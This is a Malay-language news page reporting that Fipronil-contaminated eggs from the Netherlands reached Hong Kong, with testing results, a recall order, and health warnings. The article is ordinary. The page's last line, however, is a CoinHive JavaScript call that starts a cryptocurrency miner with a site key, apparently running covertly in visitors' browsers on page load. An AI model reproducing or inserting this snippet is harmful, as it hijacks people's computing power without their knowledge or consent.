© Copyright 2017, All Rights Reserved
Home / Antarabangsa / Telur tercemar Eropah dan sampai Hong Kong

Telur tercemar Eropah dan sampai Hong Kong

HONG KONG: Skandal telur tercemar yang bermula di Belanda pada akhir Julai lalu, kini telah merebak ke negara Asia.

Terbaharu, terdapat sebahagian telur yang diimport dari Belanda dan dijual di Hong Kong disahkan mengandungi racun penyembur serangga (insecticide) dan pada tahap yang tidak selamat.

Pusat Keselamatan Makanan Hong Kong berkata pada minggu lalu, dua sampel telur Belanda yang diuji, didapati mengandungi Fipronil, sejenis bahan kimia kawalan makhluk perosak yang sangat beracun dan pada kadar yang sangat tinggi.

Susulan itu, pusat tersebut telah mengarahkan supaya semua kedai-kedai yang menjual telur berkenaan supaya tidak lagi mempamerkannya pada rak-rak jualan dan telah mengarahkan pihak pengimport untuk menarik balik telur tersebut.

Telur tercemar
Setakat ini, 15 buah negara Kesatuan Eropah (EU), telah menerima telur-telur tercemar itu.

Ekoran kejadian itu, berjuta-juta telur dan produk berasaskan telur telah ditarik dari rak pasar raya di
Eropah.

Fipronil biasanya digunakan untuk menghilangkan kutu dari haiwan tetapi diharamkan oleh Kesatuan Eropah daripada penggunaannya dalam industri makanan.

Pertubuhan Kesihatan Sedunia (WHO) berkata apabila dimakan dalam kuantiti yang banyak, Fipronil boleh membahayakan buah pinggang, hati dan kelenjar tiroid manusia.

Statistik rasmi menunjukkan, dalam tempoh lima bulan pertama tahun ini, Hong Kong telah mengimport kira-kira 927,000 telur dari Belanda.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Usaha Malaysia bantu pelarian Rohingya dihargai Presiden Turki dan anggota D8

ISTANBUL: Usaha berterusan Malaysia untuk membantu pelarian Rohingya yang kini berlindung di ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();